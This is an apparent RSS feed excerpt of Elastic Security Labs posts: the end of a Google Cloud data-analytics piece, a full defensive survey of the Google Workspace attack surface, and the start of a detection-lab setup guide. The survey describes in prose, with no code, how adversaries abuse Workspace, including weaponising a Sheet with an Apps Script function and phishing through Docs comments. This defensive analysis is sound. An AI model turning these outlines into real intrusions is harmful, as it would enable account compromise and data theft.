<p>With a few simple lines of code, we have effectively transferred our data analysis results to Google Sheets. This approach is widely used due to its accessibility and ease of use. However, there are multiple other methods to present data, each suited to different requirements and audiences. For instance, some might opt for a platform like <a href="https://cloud.google.com/looker?hl=en">Looker</a> to present the processed data in a more dynamic dashboard format. This method is particularly useful for creating interactive and visually engaging presentations of data. It ensures that even stakeholders who may not be familiar with the technical aspects of data analysis, such as those working in Jupyter Notebooks, can easily understand and derive value from the insights.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image7.png" alt="Results in Google Sheet" /></p>
<p>This streamlined process of data reduction and presentation can be applied to different types of datasets, such as cloud SIEM alerts, endpoint behavior alerts, or malware alerts. The objective remains the same: to simplify and concentrate the data for clear and actionable insights.</p>
<h1>Presentation: Showcasing the insights</h1>
<p>After meticulously refining our datasets, we now focus on the final stage: the presentation. Here we take our datasets, now neatly organized in platforms like Google Sheets or Looker, and transform them into a format that is both informative and engaging.</p>
<h2>Pivot tables for in-depth analysis</h2>
<p>Using pivot tables, we can create a comprehensive overview of our trend analysis findings. These tables allow us to display data in a multi-dimensional manner, offering insights into various aspects of cybersecurity, such as prevalent MITRE ATT&amp;CK tactics, chosen techniques, and preferred malware families.</p>
<p>Our approach to data visualization involves:</p>
<ul>
<li><strong>Broad overview with MITRE ATT&amp;CK tactics:</strong> Starting with a general perspective, we use pivot tables to overview the different tactics employed in cyber threats.</li>
<li><strong>Detailed breakdown:</strong> From this panoramic view, we delve deeper, creating separate pivot tables for each popular tactic and then branching out into detailed analyses for each technique and specific detection rule.</li>
</ul>
<p>This methodical process helps to uncover the intricacies of detection logic and alerts, effectively narrating the story of the cyber threat landscape.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image1.png" alt="Diagram showcasing aggregations funnel into contextual report information" />
Diagram showcasing aggregations funnel into contextual report information</p>
<p><strong>Accessibility across audiences:</strong> Our data presentations are designed to cater to a wide range of audiences, from those deeply versed in data science to those who prefer a more straightforward understanding. The Google Workspace ecosystem facilitates the sharing of these insights, allowing pivot tables, reduced datasets, and other elements to be easily accessible to all involved in the report-making process.</p>
<p><strong>Integrating visualizations into reports:</strong> When crafting a report, for example, in Google Docs, the integration of charts and tables from Google Sheets is seamless. This integration ensures that any modifications in the datasets or pivot tables are easily updated in the report, maintaining the efficiency and coherence of the presentation.</p>
<p><strong>Tailoring the presentation to the audience:</strong> The presentation of data insights is not just about conveying information; it's about doing so in a visually appealing and digestible manner. For a more tech-savvy audience, an interactive Colab Notebook with dynamic charts and functions may be ideal. In contrast, for marketing or design teams, a well-designed dashboard in Looker might be more appropriate. The key is to ensure that the presentation is clear, concise, and visually attractive, tailored to the specific preferences and needs of the audience.</p>
<h1>Conclusion: Reflecting on the data analysis journey</h1>
<p>As we conclude, it's valuable to reflect on the territory we've navigated in analyzing cyber threat data. This journey involved several key stages, each contributing significantly to our final insights.</p>
<h2>Journey through Google's Cloud ecosystem</h2>
<p>Our path took us through several Google Cloud services, including GCP, GCE, Colab Notebooks, and Google Workspace. Each played a pivotal role:</p>
<p><strong>Data exploration:</strong> We began with a set of cyber-related questions we wanted to answer and explored what vast datasets we had available to us. In this blog, we focused solely on telemetry being available in BigQuery.
<strong>Data extraction:</strong> We began by extracting raw data, utilizing BigQuery to efficiently handle large volumes of data. Extraction occurred in both BigQuery and from within our Colab notebooks.
<strong>Data wrangling and processing:</strong> The power of Python and the pandas library was leveraged to clean, aggregate, and refine this data, much like a chef skillfully preparing ingredients.
<strong>Trend analysis:</strong> We then performed trend analysis on our reformed datasets with several methodologies to glean valuable insights into adversary tactics, techniques, and procedures over time.
<strong>Reduction:</strong> Off the backbone of our trend analysis, we aggregated our different datasets by targeted data points in preparation for presentation to stakeholders and peers.
<strong>Transition to presentation:</strong> The ease of moving from data analytics to presentation within a web browser highlighted the agility of our tools, facilitating a seamless workflow.</p>
<h2>Modularity and flexibility in workflow</h2>
<p>An essential aspect of our approach was the modular nature of our workflow. Each phase, from data extraction to presentation, featured interchangeable components in the Google Cloud ecosystem, allowing us to tailor the process to specific needs:</p>
<p><strong>Versatile tools:</strong> Google Cloud Platform offered a diverse range of tools and options, enabling flexibility in data storage, analysis, and presentation.
<strong>Customized analysis path:</strong> Depending on the specific requirements of our analysis, we could adapt and choose different tools and methods, ensuring a tailored approach to each dataset.
<strong>Authentication and authorization:</strong> Due to our entities being housed in the Google Cloud ecosystem, access to different tools, sites, data, and more was all painless, ensuring a smooth transition between services.</p>
<h2>Orchestration and tool synchronization</h2>
<p>The synergy between our technical skills and the chosen tools was crucial. This harmonization ensured that the analytical process was not only effective for this project but also set the foundation for more efficient and insightful future analyses. The tools were used to augment our capabilities, keeping the focus on deriving meaningful insights rather than getting entangled in technical complexities.</p>
<p>In summary, this journey through data analysis emphasized the importance of a well-thought-out approach, leveraging the right tools and techniques, and the adaptability to meet the demands of cyber threat data analysis. The end result is not just a set of findings but a refined methodology that can be applied to future data analysis endeavors in the ever-evolving field of cybersecurity.</p>
<h1>Call to Action: Embarking on your own data analytics journey</h1>
<p>Your analytical workspace is ready! What innovative approaches or experiences with Google Cloud or other data analytics platforms can you bring to the table? The realm of data analytics is vast and varied, and although each analyst brings a unique touch, the underlying methods and principles are universal.</p>
<p>The objective is not solely to excel in your current analytical projects but to continually enhance and adapt your techniques. This ongoing refinement ensures that your future endeavors in data analysis will be even more productive, enlightening, and impactful. Dive in and explore the world of data analytics with Google Cloud!</p>
<p>We encourage any feedback and engagement for this topic! If you prefer to do so, feel free to engage us in Elastic’s public <a href="https://elasticstack.slack.com/archives/C018PDGK6JU">#security</a> Slack channel.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/photo-edited-12.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Google Workspace Attack Surface]]></title>
            <link>https://www.elastic.co/es/security-labs/google-workspace-attack-surface-part-one</link>
            <guid>google-workspace-attack-surface-part-one</guid>
            <pubDate>Tue, 03 Jan 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[During this multipart series, we’ll help you understand what GW is and some of the common risks to be aware of, while encouraging you to take control of your enterprise resources.]]></description>
            <content:encoded><![CDATA[<h1>Preamble</h1>
<p>Formerly known as GSuite, Google Workspace (GW) is a collection of enterprise tools offered by Google. Popular services such as Google Drive, Gmail and Google Forms are used by many small and midsize businesses (SMBs), as well as larger organizations.</p>
<p>When referring to security, GW is often mentioned because a threat is abusing or targeting services and resources. As practitioners, it is essential we consider risks associated and plan defenses accordingly. Importantly, Microsoft and Amazon offer some of the same services: if there’s a “least risk” option among them we haven’t seen evidence of it yet, and each prioritizes their own form of visibility.</p>
<p>During this multipart series, we’ll help you understand what GW is and some of the common risks to be aware of, while encouraging you to take control of your enterprise resources: - Part One - Surveying the Land - Part Two - Setup Threat Detection with Elastic - Part Three - Detecting Common Threats</p>
<p>In this publication, readers will learn more about common resources and services in GW and how these are targeted by threats. This will provide an overview of administration, organizational structures, identity access and management (IAM), developer resources, and a few other topics you should think about.</p>
<p>But before we begin, let’s highlight the importance of organizations also taking ownership of this attack surface. If you’re using these enterprise tools and don’t consider them part of your enterprise, that is the challenge to overcome first. Know where your visibility extends to, know which capabilities you can exercise within that range, and don’t mistake vendor-operated for vendor-secured.</p>
<h1>Common Services Targeted by Threats</h1>
<p><a href="https://workspace.google.com/features/">Services and applications</a> available in GW include cloud storage, email, identity and access management (IAM), chat and much more. Behind the scenes, <a href="https://developers.google.com/workspace">developers</a> can access application programming interfaces (APIs) to interact programmatically with GW. Together, these services allow organizations of all sizes to provide users with their own Internet-accessible virtual “workspace”. However, threat actors have discovered trivial and advanced methods to abuse these services. While there is plenty of information to cover, we should start with administration as it provides an overview of GW and will help set the stage for more in-depth context about applications or developer resources.</p>
<h2>Administration</h2>
<p>Few GW users are aware of the admin console or the settings it exposes, unless they happen to also be an administrator. The admin console is the central command center for GW administrators to manage the services and resources of their organization. The term “organization” is directly referenced by the primary domain registered with GW and therefore is the root node of GW. Only user accounts with administrative roles can sign-in and access their organization’s admin console.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image1.jpg" alt="Snippet of GW home page" /></p>
<p>GW employs a directory service-like structure that defines users, groups, organizational units (OUs), roles and other attributes of the enterprise for easy navigation. While the admin console is not inherently a risk, compromised valid accounts (<a href="https://attack.mitre.org/techniques/T1078/004/">T1078.004</a>) with that level of privilege expose organizations to greater risk.</p>
<p>Aside from IAM, administrators use the admin console to manage applications available to their organization. The most popular of these being Gmail, Drive and Docs, Google Meet, Google Forms, Google Sheets and Calendar. Additional Google services can be added, though most are enabled by default when setting up your GW; such as Chrome Remote Desktop. Depending on the OU configuration, permissions for users to these applications may be inherited from the root OU. The principles of least privilege (PoLP) and application control are critical to reducing organizational risk within GW.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image6.png" alt="Snippet of GW Applications and Inheritance" /></p>
<p>Administrators can also manage mobile and endpoint device enrollment, as well as network related settings from the admin console. Administrators can add devices by uploading a CSV containing the serial number, which can be assigned to a user. For corporate-owned devices, this provides convenient auditing that may unfortunately become necessary. Universal settings for mobile devices are also available, allowing data and setting synchronization for iOS, Android and Google devices. GW allows mobile device management (MDM), allowing admins to apply local changes using <a href="https://learn.microsoft.com/en-us/troubleshoot/mem/intune/deploy-oma-uris-to-target-csp-via-intune">Open Mobile Alliance - Uniform Resources</a> (OMA-URIs).</p>
<p>Coincidentally, making changes to remote enterprise endpoints is also a popular goal of adversaries.</p>
<p>GW admins have the capability to create and manage Wi-Fi, Ethernet, VPN and Cellular networks. For cellular devices this is typically done via the Subscription Management Root-Discovery Service (SM-DP) which is used to connect eSIM devices to a mobile network. VPN and proxy settings can be configured as well with routing through Google’s DNS infrastructure by default or custom routing if chosen.</p>
<p>Windows endpoints can also be managed via GW, with the capability to modify settings and synchronize data with Active Directory (AD) or an existing LDAP server. This is accomplishable with GW’s <a href="https://support.google.com/a/answer/106368?hl=en">Google Cloud Directory Sync</a> (GCDS). Settings can be applied to each endpoint, such as BitLocker, automatic updates or authentication via <a href="https://support.google.com/a/answer/9250996?hl=en">Google Credential Provider for Windows</a> (GCPW). GCPW allows users to login to a Windows endpoint with their Google account for authentication. Users with sufficient privileges can make changes to remote enterprise endpoints by configuring a <a href="https://support.google.com/a/answer/10181140#zippy=%2Cwindows-device-management%2Ccustom-settings">custom policy</a> through the configuration service provider (CSP). This is possible with the Windows 10 enterprise platform, which exposes endpoint configuration settings that allow GW, as a MDM service to read, set, modify or delete configuration settings. Microsoft has an <a href="https://learn.microsoft.com/en-us/windows/configuration/provisioning-packages/how-it-pros-can-use-configuration-service-providers#a-href-idbkmk-csp-docahow-do-you-use-the-csp-documentation">extensive list</a> of CSP settings that are exposed for management via custom policies. While integration between platforms is important to daily operations, this service equips adversaries with the capability to expand their intrusion into the Windows ecosystem.</p>
<h2>Organizational Structure</h2>
<p>The digital structure of an enterprise in GCP or GW is often hierarchical: where the registered domain is the top-level, parent, or root, and any nested organizations under this are used for the grouping and permission scoping.</p>
<p>An important subject to understand for GW are OUs, which can be thought of as “departments” within an organization and can have subsidiary OUs. The hierarchy starts with a top-level OU, typically from the primary domain registration and organization name where child units can be added as needed. Service and application access are then inherited from the top-level OU if not specified. Users assigned to an OU will have access to any services and resources as inherited.</p>
<p>As an alternative, administrators can create and manage access groups to add an additional layer of resource-based control. Users who are assigned to an access group will inherit access and permissions from those set for the group itself, which may bypass restrictions set on the OU they are assigned to. For example, if an OU for engineering is without access to Drive and Docs, a user is assigned to an access group with access to Drive and Docs can bypass the child OU settings.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image7.png" alt="Diagram showing access groups with custom application access than that of the child OU" /></p>
<p>GW’s organizational structure and layered approach to access control enables administrators to scope roles easier for users. Unfortunately, incomplete or misconfigured access controls could allow unexpected permission inheritance from the top-level OU. Access restrictions could unexpectedly be bypassed by users outside their expected access groups, thus introducing insider threat risk via additional cloud roles (<a href="https://attack.mitre.org/techniques/T1098/003/">T1098.003</a>).</p>
<h2>Identity Access and Management</h2>
<h3>Identity vs Account</h3>
<p>The identity of users when using Google’s services is that of the account being used, often the email address. Identity does differ from user account slightly in that the identity of a user is unique, but the user account is a data structure keeping track of configurations, attributes, activities and more when interacting with Google’s services.</p>
<p>Standalone Gmail addresses (@gmail.com) are consumer accounts typically meant to be used by a private individual, whereas Gmail addresses with a registered domain name are managed user accounts as their lifecycle and configuration are fully managed by the organization. Therefore, when we discuss IAM in this publication, the context is typically towards managed user accounts whose identity and data is managed by the GW organization.</p>
<p>However, the relationship between identity and account does not have to be 1:1, meaning an email address, or identity, can be tied to two separate user accounts. If an organization does not enforce a new and separate identity for their users, risk looms around the private user account whom’s settings are managed by the user themselves, not the organization. In this example, the widespread use of valid compromised accounts undermines the ability of defenders to identify when this is malicious versus benign.</p>
<h3>Machine Accounts</h3>
<p>Machine accounts exist and allow developers to interact with Google services and resources programmatically. These are not managed within GW, but rather Google Cloud Platform (GCP) via the use of service accounts. A bridge exists in the form of domain-wide delegation between GW and GCP.</p>
<p>This feature authorizes GCP service accounts to access data, resources, services and much more within GW via application APIs. OAuth2 is the protocol used for authentication between GCP service accounts and GW.</p>
<p>The most common risk of this approach is with the storage and use of service account credentials. Since service accounts often have elevated privileges due to their automation and programmatic intentions, adversaries prioritize finding these credentials, such as a Linux cloud worker. Often, public/private key pairs are stored insecurely for local scripts or programs that use them. Adversaries can then discover the unsecured credentials (<a href="https://attack.mitre.org/techniques/T1552/">T1552</a>) from a text file, extract them from memory, environment variables or even log files. Once compromised, adversaries have a bridge into GW from GCP with a valid service account that may be monitored less diligently than a user account.</p>
<h3>Roles and Groups</h3>
<p>Within GW, role-based access control (RBAC) only exists at the administrative level. This means the default and custom roles can be set up and configured from the admin console, however, the privileges available are mainly administrative. As we discussed earlier, Google’s hierarchy is top-down starting with the root OU, followed by child OUs; resources and services are enabled or disabled on a per-OU basis. By default a non-admin user belongs under the root OU, thus inheriting any access explicitly set at the root level where global privileges should be minimal.</p>
<p>Not to be confused with Google’s Group application, access groups allow administrators to set specific access and privileges to resources and services at the user-level, similar to role-level controls. Typically, a group is created and then privileges to resources and services are assigned. Users are then added as members to those specific groups, overriding or superseding inherited privileges from the OU.</p>
<h3>External Identities</h3>
<p>As stated before, Gmail’s email names are unique IDs so users can use the same ID for both their consumer account and managed user accounts with the use of an external identity provider (IdP). This process typically requires single sign-on (SSO) via security assertion markup language (SAML) and therefore the IdP must recognize the identity before they can sign on.</p>
<p>Authentication is relayed from GW to the SAML IdP and relies on trusting the external provider’s identification verification. This is even true for active directory (AD) services or Okta where those become the external authoritative source. Data in transit during the SAML SSO process presents the greatest risk, and intercepted SAML responses to the IdP may be used to authenticate via forged credentials (<a href="https://attack.mitre.org/techniques/T1606/002/">T1606.002</a>).</p>
<h2>Developer Resources</h2>
<p>There are two methods for programmatically interacting with GW: Google <a href="https://workspace.google.com/products/apps-script/">Apps Script</a>and <a href="https://developers.google.com/workspace">REST APIs</a>. Google Apps Script is an application development platform for fast and easy business applications to better integrate with GW. Whereas, REST APIs provide a direct method of communicating with GW, often in cases where integration is not fast or easy. External interaction with GW is another benefit to REST APIs, as Apps Script is meant for internal use.</p>
<h3>Apps Script</h3>
<p>With Apps Script, developers use JavaScript with access to built-in libraries specific to each Google application. The term “rapid” is often emphasized because the platform is available at the domain, script.google.com, and tied directly to the organization the user is logged into, no installation at all. This tool can be extremely useful for accomplishing tasks in GW related to existing applications, administrative settings and more.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image5.jpg" alt="Apps Script code written to create a Google doc and email it to myself" /></p>
<p>Each coding application you create in Apps Script is known as a project and can be used by other GW tools. Within that project, you write your JavaScript code as you see fit. From its console, you can run, debug or view execution logs.</p>
<p>The project can also be deployed to your GW with versioning control as a web application, API executable, Add-on or Library. Script’s can also be deployed as libraries, making code shareable across projects. Last but not least, triggers can be set for each project where specific functions can be run at specific times allowing developers to choose which code blocks are executed and when.</p>
<h2>Applications</h2>
<p>In GW, the main attraction to organizations is typically the abundance of native applications offered by Google. Google’s Drive, Docs, Gmail, Sheets and Forms are just a few that are readily available to users for communication, storage, documentation or data gathering and analysis. All of these applications make up a user’s workspace, but are also targeted by adversaries because of their popularity and seamless integration with each other.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image8.jpg" alt="Prompt" /></p>
<p>Therefore it is essential to understand that while applications compliment each other in GW, they often require <a href="https://developers.google.com/apps-script/guides/services/authorization">authorization</a> to each other where access rights have to be explicitly granted by the user. While security practitioners may generally be suspicious of applications requiring access, general users may not and grant access without thinking twice. This then allows malicious applications such as Apps Script functions contained in a Google Sheet, to access the private data behind each application.</p>
<h3>Gmail</h3>
<p>Arguably the most popular application provided by GW, Gmail has historically been abused by adversaries as a delivery mechanism for malicious attachments or links. For those unaware, Gmail is Google’s free email service with nearly 1.5 billion active users as of 2018, according to a statista <a href="https://www.statista.com/statistics/432390/active-gmail-users/">report</a>.</p>
<p>Phishing (<a href="https://attack.mitre.org/techniques/T1566/">T1566</a>) is often the most common technique conducted by adversaries with the help of Gmail, where stealing valid credentials is the goal. Victims are sent emails containing malicious attachments or links where malware may be installed or a user is redirected to a fake website asking for credentials to login. If account compromise occurs, this allows for internal spear phishing (<a href="https://attack.mitre.org/techniques/T1534/">T1534</a>) attacks, potentially targeted towards an existing administrator.</p>
<p>Email collection (<a href="https://attack.mitre.org/techniques/T1114/">T1114</a>) is another technique used by adversaries whose modus operandi (MO), may be to simply collect sensitive information. In GW, administrators have privileges to set custom global mail routes for specific users, groups or OUs, whereas users can create their own forwarding rules as well. Capability for an adversary to do so, whether manually or programmatically, comes down to valid account compromise and therefore signs of this activity may be found later in the intrusion process.</p>
<p>Taking Gmail a step further, adversaries may also use GW’s web services (<a href="https://attack.mitre.org/techniques/T1102/">T1102</a>) for command and control purposes as <a href="https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/">identified</a> by ESET researchers regarding the ComRAT v4 backdoor of 2020. With attribution pointed towards advanced persistent threat (APT) group, Turla, the abuse of Gmail is also a tool for more advanced threats.</p>
<h3>Drive</h3>
<p><a href="https://workspace.google.com/products/drive/">Google Drive</a>, being a free digital storage service with an active Gmail account, is also a common target by adversaries. Where valid accounts are compromised, adversaries have the capability to steal private data stored in Google Drive. Sharing documents in Google Drive relies on a trust model, where the user can create a custom shareable link and invite others. Administrators have the capability to enable and expose public shared drives from their organization as well. Access and privileges rely on sharing permissions set by the owner or organization and the intended recipient for either the shareable link or Google cloud identity who has access to those shared objects.</p>
<p>Let’s not forget that GW allows administrators to set up enterprise mobility management (EMM) and mobile device management (MDM) for mobile devices. These mobile devices then have access to private shared drives in an organization’s Google drive space. An adversary could take advantage of this to obtain unauthorized access to mobile devices via these remote services (<a href="https://attack.mitre.org/tactics/TA0039/">TA0039</a>). Geographic coordinates of a mobile device or end user could also be obtained from such services if abused to do so.</p>
<p>Command and control via bidirectional communication (<a href="https://attack.mitre.org/techniques/T1102/002/">T1102.002</a>) to a Google Drive is another option for adversaries who may be using the service to host and deploy malicious payloads as those from <a href="https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/">APT29</a>. Oftentimes, this reflects compromised web services (<a href="https://attack.mitre.org/techniques/T1584/006/">T1584.006</a>) simply through a valid account and enabled Google Drive API. This is often the case when adversaries may leverage Google Drive to stage exfiltrated data programmatically prior to its final destination.</p>
<h3>Docs</h3>
<p>Integrated with Google Drive is <a href="https://workspace.google.com/products/docs/">Google Docs</a>, a free online word processing service where users can create documents which are then stored in their Google Drive. For collaboration purposes, documents have extensive markup capabilities, such as comments, which have recently been abused to distribute phishing and malware. This technique, <a href="https://www.avanan.com/blog/google-docs-comment-exploit-allows-for-distribution-of-phishing-and-malware">discussed</a> by Check Point company, Avanan, allows adversaries to simply create a document and add a comment where they include the target’s email address and a malicious link, helping evade spam filters and security tools. Combining this phishing campaign with a native JavaScript application development platform such as Apps Script in GW would allow for expanded distribution with minimal costs. Luckily the extent of malicious Google documents ends with malicious links, but it would be immature to suggest adversaries will not eventually develop new techniques to abuse the service.</p>
<h3>Sheets</h3>
<p>As with Google Docs, <a href="https://workspace.google.com/products/sheets/">Google Sheets</a> is another service often abused by adversaries to deliver malicious links or payloads. Google Sheets is a spreadsheet program, similar to Excel from Microsoft. Automated tasks can be created with the use of macros and of course triggers for those macros to be executed as well. While built-in functions exist, custom functions can be created via Google’s Apps Script platform and then imported into the Google Sheet document itself. Apps Script has native JavaScript libraries for interacting with other Google services and their respectful APIs. Thus if an adversary were to weaponize a Google Sheet document of their liking, resource development starts with a custom function, built with Apps Script. The function is imported into the Google Sheet and then shared with the intended target by commenting their email address and allowing access. Once triggered, the malicious code from the function would be executed and continue the intrusion process.</p>
<p>A step further may be to share with them a <a href="https://support.google.com/a/users/answer/9308866?hl=en">copy link</a>, rather than an edit link which would copy the sheet containing the malicious macro to their own Google drive and upon execution carry out the intended task as the user since the sheet’s owner is now the target. For distribution, access to a user’s contacts within their GW organization, may allow worm-like capabilities as <a href="https://nakedsecurity.sophos.com/2017/05/05/google-phish-thats-a-worm-what-happened-and-what-to-do/">discovered</a> by Sophos in 2017.</p>
<h2>Marketplace</h2>
<p>GW’s <a href="https://apps.google.com/supportwidget/articlehome?hl=en&amp;article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F172391%3Fhl%3Den&amp;product_context=172391&amp;product_name=UnuFlow&amp;trigger_context=a">marketplace</a> is an online application store with additional enterprise applications that can be integrated into an organization and accessed by users. Administrators are responsible for managing application accessibility and surveying risk associated with such apps. A large portion of these applications are 3rd-party and Google clearly states their <a href="https://developers.google.com/workspace/marketplace/terms/policies">policies</a> for being a contributor. The risk associated with 3rd-party applications in the GW marketplace is access to private data from information repositories (<a href="https://attack.mitre.org/techniques/T1213/">T1213</a>) or the resident data of the user and/or organization behind each application.</p>
<p>Granted for administrators, when browsing applications, permission access can be reviewed via the application itself prior to installation. This way, administrators can review whether the risk inherited from such access is worth the solution it potentially may provide.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image4.jpg" alt="GW access request example for Signeasy application" /></p>
<h2>Reporting</h2>
<p>As with most cloud consoles and environments, GW has a native reporting feature that helps administrators capture the activity in their environment. Located in the admin console of GW under Reporting, administrators have the following options.</p>
<ul>
<li>Highlights - Dashboard of basic metrics for GW environments</li>
<li>Reports - Apps, cost, user and devices reporting in the form of basic dashboard metrics or tabled data about user accounts</li>
<li>Audit and Investigation - Location of all logs, categorized by activity</li>
<li>Manage Reporting Rules - Redirection to rules space, filtering on “Reporting” rules which are custom</li>
<li>Email Log Search - Search across the Gmail accounts of all users within the organization. Filters include Date, Sender, Sender IP, Recipient, Recipient IP, Subject and Message ID</li>
<li>Application Uptime - Uptime for applications enabled in the GW. Uptime is relative to Google’s infrastructure.</li>
</ul>
<p>Of this reporting, Google does a decent job of providing tabular data about user status and account activity in GW such as 2-step verification status and password strength, as well as additional security metrics. For example, shared links to Google resources that have been accessed outside of the domain. Additional user report documentation from Google can be found <a href="https://apps.google.com/supportwidget/articlehome?hl=en&amp;article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F4580176%3Fhl%3Den&amp;product_context=4580176&amp;product_name=UnuFlow&amp;trigger_context=a">here</a>.</p>
<p>The most reliable data is GW’s native logging, found under “Audit and Investigation”. As stated prior, these logs are organized into their own separate folders based on activity, application, identity or resource.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image9.png" alt="Admin log events from GW reporting" /></p>
<p>Logs are stored in a tabular format with date, event, description, actor and IP address all being recorded by default. The description contains another layer of verbosity as to what activity occurred, oftentimes including JSON key and value pairs for specific values pulled from the GW for reporting.</p>
<p>In regards to threats, often adversaries will attempt indicator removal (<a href="https://attack.mitre.org/techniques/T1070/">T1070</a>) by clearing audit logs to remove any potential footprints, however, GW audit logs are managed by Google and have <a href="https://apps.google.com/supportwidget/articlehome?hl=en&amp;article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F7061566%3Fhl%3Den&amp;product_context=7061566&amp;product_name=UnuFlow&amp;trigger_context=a">retention policies</a> only. Therefore, it is essential to route audit logs from GW to an on-premise or cloud storage solution such as GCP via storage buckets. For more information on how Elastic’s GW integration routes audit logs, visit <a href="https://docs.elastic.co/en/integrations/google_workspace">here</a>.</p>
<h2>Rules</h2>
<p>While GW provides a reporting feature that focuses on logging activity within an organization’s digital environment, it also has a detection rules feature as well.</p>
<p>These are not directly marketed as a security information and event management (SIEM) tool, but resemble that functionality. Shipped with some default rules, the “Rules” feature in GW allows administrators to automatically monitor for specific activity and set specific actions. Each rule allows you to customize the conditions for the rule to match on and of course what actions to perform when conditions are met. Rules are broken down into reporting, activity, data protection, system defined, or trust rules where custom creation and viewing require specific privileges.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image10.png" alt="Administrator view of existing rules" /></p>
<p>In regards to granularity, administrators are at the mercy of data sourced from the audit logs when creating custom rules, whereas system defined rules provided by Google have additional data source insight. Rule alerts are directly accessible via the security alert center feature in GW, where further analysis, assignment, status and more can be edited.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image3.jpg" alt="User suspended alert in GW" /></p>
<h2>Conclusion</h2>
<p>With this introduction to GW as an attack surface, we hope you better understand the risks associated with these enterprise resources. Powerful virtual workspaces have become an essential capability of distributed productivity, which both establishes their utility and exposes them to threats. As adversaries continue to abuse GW, enterprises would be well-advised to understand its security while taking ownership of improving it. Proper administration, strong policy settings, IAM, and using the visibility they have are some of the recommendations we would offer.</p>
<p>Soon we’ll release part two in this series and show you have to setup a threat detection lab for GW with Elastic components. And in our third publication, we’ll explore in-depth attack scenarios that reveal specific defensive strategies aligned to success.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/photo-edited-01-e.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Google Workspace Attack Surface]]></title>
            <link>https://www.elastic.co/es/security-labs/google-workspace-attack-surface-part-two</link>
            <guid>google-workspace-attack-surface-part-two</guid>
            <pubDate>Tue, 03 Jan 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[During part two of this multipart series, we’ll help you understand how to setup a GW lab for threat detection and research.]]></description>
            <content:encoded><![CDATA[<h1>Preamble</h1>
<p>As a continuation of this series about Google Workspace’s (GW) attack surface, we diverge from surveying the land and focus on setting up a threat detection lab with Elastic. In <a href="https://www.elastic.co/es/security-labs/google-workspace-attack-surface-part-one">part one</a>, we explored the important resources and capabilities of GW, while tracking intrusion techniques that adversaries may leverage. In part two, we will give you the foundation needed to begin researching threats targeting GW, and provide resources for detecting those threats using Elastic technologies. The information used during the steps provided should be adjusted for your own lab and testing environment. If you do not feel the need to set up your own lab, that’s fine as this includes examples showing you how we detect threats to GW.</p>
<p>Following this will be part three of this series, in which we cover common intrusion techniques by emulating the GW environment and simulating threat activity. In doing so, we’ll build detection logic to further detect several common techniques.</p>
<p>Elastic resources will be freely available but a registered domain for GW is necessary and will be covered in the upcoming steps, strictly for maximum authenticity. Approximate lab setup time is 20-30 minutes.</p>
<h2>Let’s Get You Up to Speed</h2>
<p>For those who may not be familiar with Elastic’s current stack: take a few minutes to review the current <a href="https://www.elastic.co/es/blog/category/solutions">solutions</a> it offers. In short, the stack is an all-encompassing product that can be deployed anywhere from a single interface! If you would like to explore more information about the Elastic security solution, the <a href="https://www.elastic.co/es/guide/en/security/current/getting-started.html">documentation</a> is a great starting point.</p>
<p>In this article, we will focus specifically on the security solution which includes a robust detection engine and 600+ pre-built threat <a href="https://github.com/elastic/detection-rules/tree/main/rules">detection rules,</a> an endpoint agent that can be deployed to Windows, Linux, or macOS endpoints and collect data from various on-premise and cloud environments, as well as detect and prevent threats in real-time. Not to mention, this endpoint behavior logic is also all public in our <a href="https://github.com/elastic/protections-artifacts">protections artifacts</a> repository.</p>
<p>Our endpoint agent orchestrator, <a href="https://www.elastic.co/es/guide/en/fleet/current/fleet-overview.html">Fleet</a>, is manageable from the Kibana interface in the Elastic Stack. Fleet allows us to set up and deploy security policies to our endpoint agents. These policies are extremely customizable, thanks to an extensive list of supported <a href="https://www.elastic.co/es/integrations/">Integrations</a>.</p>
<p>Think of an Integration as a module for the Elastic Agent that provides processors to collect specific data. When added to our security policy, an Integration allows the Elastic Agent to ingest logs, apply our Elastic Common Schema (ECS), and store them in the Elastic Stack for searching or to trigger alerts. If you're curious about a specific integration Elastic has, you can search for it <a href="https://www.elastic.co/es/integrations/data-integrations">here</a>!</p>
<p>With this information you could almost assume the Elastic Stack allows you to manage all of this with just one information technology (IT) guy.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/ned.jpeg" alt="" /></p>
<p>Either way, our goal is to create a threat detection lab for <a href="https://docs.elastic.co/en/integrations/google_workspace">Google Workspace</a> as depicted in this diagram:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image14.png" alt="Simple architecture layout and process workflow" /></p>
